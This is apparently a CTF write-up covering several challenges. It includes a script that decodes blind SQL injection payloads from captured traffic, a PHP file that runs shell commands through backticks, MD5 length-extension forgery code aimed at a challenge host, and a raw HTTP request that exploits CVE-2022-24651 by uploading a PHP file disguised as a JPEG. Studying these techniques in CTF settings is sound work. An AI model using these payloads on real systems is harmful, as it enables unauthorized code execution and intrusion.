Misc

1.sqlshark

Export all the HTTP packets from Wireshark as JSON (File > Export Packet Dissections > As JSON with an `http` display filter), then write a script to filter them. The capture is a boolean-based blind SQL injection: every request guesses one character of the password with `ord(substr(...)) in (X)`, and the response text says whether the guess was right, so the script pairs each request with its response and keeps the guesses that succeeded.

import json

# Wireshark's JSON export of the http traffic; the packets come out in
# capture order as request, response, request, response, ...
with open("res.json", "r", encoding="utf-8") as f:
    r = json.load(f)

PROBE = "if(((((ord(substr((select(group_concat(password))from(users)) from "
PREFIX = "any'/**/or/**/(" + PROBE
res = []
for i in range(0, len(r), 2):
    form = r[i]["_source"]["layers"]["urlencoded-form"]
    t = list(form.keys())[-1]                         # last form field = injected parameter
    body = list(r[i + 1]["_source"]["layers"]["data-text-lines"].keys())[-1]
    if "correct" not in body:                         # oracle: a response without "correct" = guess was right
        value = form[t]["urlencoded-form.value"].lower()
        if PROBE in value:
            # "... from N for 1))))in(X)),1,0))#" -> "N,X"
            res.append(value.replace(PREFIX, "")
                            .replace("))),1,0))#", "")
                            .replace(" for 1))))in(", ","))

# each entry is "position,ordinal"; the requests already come in position order
for entry in res:
    pos, code = entry.split(",")
    print(chr(int(code)), end="")
print()
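As an added example (my code, not the writeup's script), the same extraction written against Wireshark's own request/response cross-reference instead of assuming the export alternates request, response: in the JSON export a request frame carries `http.response_in`, the frame number of its response, so pipelined or dropped responses do not shift the pairing. The sample packets below are constructed to mimic the export's `frame`, `http`, `urlencoded-form` and `data-text-lines` layers; the oracle (a response without `correct` means the guessed character was right) is the one the script above uses, and positions that never got a "true" answer are marked `?` rather than silently dropped.

```python
import json
import re

# Payload shape from the capture: one request probes one character of the password
# with "... from <pos> for 1 ...)in(<ord>)"; the regex pulls both numbers out.
PROBE = re.compile(r"from (\d+) for 1\)+in\((\d+)\)")

def recover_from_export(packets, oracle=lambda text: "correct" not in text):
    """packets: the list Wireshark writes with Export Packet Dissections > As JSON."""
    by_frame = {}
    for p in packets:
        layers = p["_source"]["layers"]
        by_frame[layers["frame"]["frame.number"]] = layers
    found = {}
    for layers in by_frame.values():
        form = layers.get("urlencoded-form")
        http = layers.get("http", {})
        if not form or "http.response_in" not in http:
            continue                     # not a request, or its response was never captured
        value = " ".join(item["urlencoded-form.value"] for item in form.values()).lower()
        m = PROBE.search(value)
        if not m:
            continue                     # some other request (a normal login attempt etc.)
        response = by_frame.get(http["http.response_in"], {})
        text = " ".join(response.get("data-text-lines", {}).keys()).lower()
        if oracle(text):
            found[int(m.group(1))] = chr(int(m.group(2)))
    if not found:
        return ""
    return "".join(found.get(i, "?") for i in range(1, max(found) + 1))

# --- constructed sample export: what a few frames of such a capture look like as JSON ---
PAYLOAD = ("any'/**/or/**/(if(((((ord(substr((select(group_concat(password))from(users)) "
           "from {pos} for 1))))in({code})),1,0))#")

def _request(frame, pos, code, response_frame):
    value = PAYLOAD.format(pos=pos, code=code)
    return {"_source": {"layers": {
        "frame": {"frame.number": str(frame)},
        "http": {"http.response_in": str(response_frame)},
        "urlencoded-form": {
            'Form item: "username" = "any"': {"urlencoded-form.key": "username",
                                              "urlencoded-form.value": value},
            'Form item: "password" = "x"': {"urlencoded-form.key": "password",
                                            "urlencoded-form.value": "x"}}}}}

def _response(frame, text):
    return {"_source": {"layers": {
        "frame": {"frame.number": str(frame)},
        "http": {},
        "data-text-lines": {text: ""}}}}

SAMPLE = [
    _request(1, 1, 101, 2), _response(2, "username or password incorrect"),  # 'e'? no
    _request(3, 1, 102, 5),                                                 # 'f'? (answered in 5)
    _request(4, 2, 108, 6),                                                 # 'l'? (answered in 6)
    _response(5, "welcome back"),                                           # yes
    _response(6, "welcome back"),                                           # yes
    _request(7, 3, 97, 8), _response(8, "welcome back"),                    # 'a'
    _request(9, 4, 103, 10), _response(10, "welcome back"),                 # 'g'
]

if __name__ == "__main__":
    print(recover_from_export(SAMPLE))   # flag
    # real capture: print(recover_from_export(json.load(open("res.json", encoding="utf-8"))))
```

The oracle is a parameter on purpose: on a different target the "true" branch may be the one that contains a marker rather than the one that lacks it, and that is the only line that has to change.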

2.OnlyLocalSql

Connect over SSH.

cd /var/www/html
# quote the delimiter: with a bare EOF the shell runs `ls /f*` itself while writing
# the file; quoted, the backticks reach PHP and run as the web server's user
cat << 'EOF' > flag.php
<?php echo `ls /f*`;
EOF
curl http://localhost/flag.php

That's it.

You could also add an ssh -L forward to your own machine, but there's no need.

3.LearnOpenGL

I think my solution was unintended.

In the shaders package, remove spriteparticle, then open it and you can see it directly.

4.ez_msb

249 => 11111001.

The data sits in the second bit. The main catch is the MSB (bit order). I didn't really feel like writing an implementation in Python, so I just used GNU Radio Companion.

image
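Added example (my code, not the writeup's; the author did this in GNU Radio Companion instead): the bit slicing in Python. It assumes one payload bit is stored in the second-most-significant bit of each byte (bit index 1 counting from the MSB), which is how I read "the data sits in the second bit" above. `embed_bits` only builds a constructed sample so the extraction can be checked; `extract_bits` shows why the bit order is the whole problem: the same bit stream packed LSB-first gives different bytes.

```python
def byte_bits(byte, msb_first=True):
    """The 8 bits of one byte in the chosen order: 249 -> 1,1,1,1,1,0,0,1 MSB-first."""
    order = range(7, -1, -1) if msb_first else range(8)
    return [(byte >> k) & 1 for k in order]

def pack_bits(bits, msb_first=True):
    """Inverse of byte_bits over a whole bit stream; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        chunk = bits[i:i + 8] if msb_first else bits[i:i + 8][::-1]
        out.append(int("".join(map(str, chunk)), 2))
    return bytes(out)

def extract_bits(data, bit_index=1, msb_first=True):
    """Take bit `bit_index` (0 = MSB ... 7 = LSB) from every byte and repack the stream."""
    shift = 7 - bit_index
    return pack_bits([(b >> shift) & 1 for b in data], msb_first)

def embed_bits(cover, payload, bit_index=1, msb_first=True):
    """Constructed test-data generator: hide payload bits in bit `bit_index` of each cover byte."""
    bits = [bit for byte in payload for bit in byte_bits(byte, msb_first)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for payload")
    shift = 7 - bit_index
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~(1 << shift) & 0xFF) | (bit << shift)
    return bytes(out)

if __name__ == "__main__":
    cover = bytes([249] * 16)       # 249 = 0b11111001: bit 1 from the MSB is already set
    stego = embed_bits(cover, b"hi")
    print(extract_bits(stego, 1, msb_first=True))    # b'hi'
    print(extract_bits(stego, 1, msb_first=False))   # b'\x16\x96'  (wrong bit order)
```

If the output looks like high-bit garbage rather than text, flip `msb_first` before doubting the bit index: reversing the order within each byte is exactly the transformation between the two outputs above.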

5.Survey

Next time I'll put "very easy" again.

Crypto

1.SignAhead

MD5 length extension attack.

hashpump wouldn't compile, so I found another tool (HashTools).

from pwn import *
import HashTools   # pure-Python length-extension library used in place of hashpump

context.log_level = 'info'
P = remote("manqiu.top", 20924)
md5 = HashTools.MD5()
for i in range(100):
    P.readline()
    msg = bytes.fromhex(P.readline().decode().split(":")[1].strip())
    print("[*] msg:", msg)
    sign = P.readline().decode().split(":")[1].strip()
    print("[*] sign:", sign)
    P.readline()

    # secret is 32 bytes; forge sign(secret || msg || glue padding || b"233")
    # from the MD5 state encoded in `sign`, without ever knowing the secret
    nmsg, nsign = md5.extension(32, msg, b"233", signature=sign)
    print("[*] nmsg:", nmsg.hex())
    print("[*] nsign:", nsign)
    P.sendlineafter(b": ", nmsg.hex().encode())
    P.sendlineafter(b": ", nsign.encode())
    print(P.readline())

print(P.recvline())
P.close()
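Added example, not from the writeup or from HashTools: the length extension done by hand, so the attack is not a black box. MD5 hashes 64-byte blocks and its digest is literally the internal state after the last block, so knowing md5(secret || msg) and len(secret) lets you resume hashing: the forged message is msg || glue || append, where the glue is exactly the padding MD5 would have applied to secret || msg. The 32-byte secret length and the b"233" suffix are the values the script above uses; the secret itself is constructed here only so the forgery can be checked against a real MD5.

```python
import hashlib
import math
import struct

MASK = 0xFFFFFFFF
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2**32) & MASK for i in range(64)]
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)

def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & MASK

def _compress(state, block):
    """One MD5 compression of a 64-byte block into the four 32-bit state words."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & MASK
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & MASK
    return tuple((x + y) & MASK for x, y in zip(state, (a, b, c, d)))

def md5_padding(length):
    """What MD5 appends to a message of `length` bytes: 0x80, zeros, 64-bit LE bit count."""
    return (b"\x80" + b"\x00" * ((55 - length) % 64)
            + struct.pack("<Q", (length * 8) & 0xFFFFFFFFFFFFFFFF))

def _hash_from(state, data):
    """Continue hashing `data` (a whole number of blocks) from a given state."""
    for off in range(0, len(data), 64):
        state = _compress(state, data[off:off + 64])
    return struct.pack("<4I", *state).hex()

def md5(data):
    return _hash_from(_IV, data + md5_padding(len(data)))

def md5_extend(signature, secret_len, msg, append):
    """Given signature = md5(secret || msg) and len(secret), return
    (msg || glue || append, md5(secret || msg || glue || append)) without the secret."""
    state = struct.unpack("<4I", bytes.fromhex(signature))  # the digest is the final state
    glue = md5_padding(secret_len + len(msg))
    already_hashed = secret_len + len(msg) + len(glue)      # a multiple of 64
    tail = append + md5_padding(already_hashed + len(append))
    return msg + glue + append, _hash_from(state, tail)

def verify_extension(secret, msg, append):
    """Self-check (needs the secret, so testing only): forge from the public data,
    then confirm against a real MD5 of the extended message."""
    sig = hashlib.md5(secret + msg).hexdigest()
    nmsg, nsig = md5_extend(sig, len(secret), msg, append)
    return (nmsg.startswith(msg) and nmsg.endswith(append)
            and hashlib.md5(secret + nmsg).hexdigest() == nsig)

if __name__ == "__main__":
    secret = b"S" * 32                            # constructed; the attacker never sees it
    msg = bytes.fromhex("deadbeef")
    sig = hashlib.md5(secret + msg).hexdigest()   # what the service hands out
    nmsg, nsig = md5_extend(sig, 32, msg, b"233")
    print(nmsg.hex(), nsig)
    print(verify_extension(secret, msg, b"233"))  # True
```

The glue contains 0x80 and NUL bytes, which is why the service takes the message hex-encoded; it is also why a server that rejects non-printable input, or uses an HMAC instead of md5(secret || msg), is not vulnerable to this.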

2.basiccry

Send in a superincreasing (or superdecreasing) sequence as the weights and you can read the value of one row straight off the returned sum.

from pwn import *

context.log_level = 'info'
P = remote("manqiu.top", 21175)
# weights 2^255, 2^254, ..., 1: a superincreasing sequence, so a subset sum
# is just the binary representation of the chosen subset
weights = [2**i for i in range(255, -1, -1)]
P.sendlineafter(b":", ",".join(str(w) for w in weights).encode())

# 256 rows of a 0/1 matrix
cc = []
for i in range(256):
    v = P.recvline().decode().strip().strip('[]').split(' ')
    cc.append([int(x) for x in v if x in ('0', '1')])
# then a tuple of sums, one per row
v = P.recvline().decode().strip().strip('()').split(',')
v = [int(x) for x in v]
P.close()

# decode the first sum back into its 256 bits (greedy, highest weight first)
d = v[0]
ans = ""
for w in weights:
    if d >= w:
        d -= w
        ans += "1"
    else:
        ans += "0"

# row 0 xor the recovered bits gives the plaintext bits
row = [(cc[0][i] - int(ans[i])) % 2 for i in range(len(cc[0]))]
for i in range(0, len(row), 8):
    print(chr(int("".join(map(str, row[i:i + 8])), 2)), end="")
print()
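Added example (my code, not the challenge's): a mock of the service as the script above implies it behaves, plus the recovery generalised from powers of two to any superincreasing weight list. The assumed service model: it holds a secret 0/1 vector k and the flag bits p, takes a weight vector w from the client, and returns p xor k together with the subset sum of the w_j where k_j = 1. With superincreasing weights that sum has a unique greedy decomposition, so a single query reveals k and therefore p. The flag and key below are constructed.

```python
import secrets

def bytes_to_bits(data):
    return [(byte >> k) & 1 for byte in data for k in range(7, -1, -1)]

def bits_to_bytes(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))

def superincreasing_weights(n):
    """2^(n-1), ..., 2, 1: the sequence the script above sends (weight i pairs with bit i)."""
    return [1 << (n - 1 - i) for i in range(n)]

def decode_superincreasing(total, weights):
    """Greedy subset-sum decode. Works for any superincreasing sequence listed high to
    low (each weight larger than the sum of all the weights after it), not just powers of two."""
    bits = []
    for w in weights:
        if total >= w:
            total -= w
            bits.append(1)
        else:
            bits.append(0)
    if total != 0:
        raise ValueError("sum is not a subset sum of these weights")
    return bits

class MockService:
    """Constructed stand-in for the challenge service (assumed behaviour, see lead-in)."""
    def __init__(self, flag, key=None):
        self.p = bytes_to_bits(flag)
        self.k = bytes_to_bits(key if key is not None else secrets.token_bytes(len(flag)))

    def query(self, weights):
        if len(weights) != len(self.k):
            raise ValueError("need exactly one weight per key bit")
        masked = [pi ^ ki for pi, ki in zip(self.p, self.k)]
        total = sum(ki * wi for ki, wi in zip(self.k, weights))
        return masked, total

def recover_flag(service, n):
    """One query: superincreasing weights -> sum decodes to k -> unmask p."""
    weights = superincreasing_weights(n)
    masked, total = service.query(weights)
    key = decode_superincreasing(total, weights)
    return bits_to_bytes([m ^ k for m, k in zip(masked, key)])

if __name__ == "__main__":
    flag = b"flag{superincreasing}"
    print(recover_flag(MockService(flag), 8 * len(flag)))   # random key, still one query
```

The defence side of the same observation: a service that lets the client choose the weights it multiplies a secret bit vector by leaks that vector in one query unless the weights are fixed or the sum is hidden; the chosen sequence does not even have to be powers of two.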

Web

1.Checkin

Just open DevTools (F12) and find the variable _0x3d9d in game.js.

2.TrySent

CVE-2022-24651

POST /user/upload/upload HTTP/1.1
Host: target.com
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

JFIF
<?php RCE;?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

3.codefever_again

https://github.com/PGYER/codefever/issues/140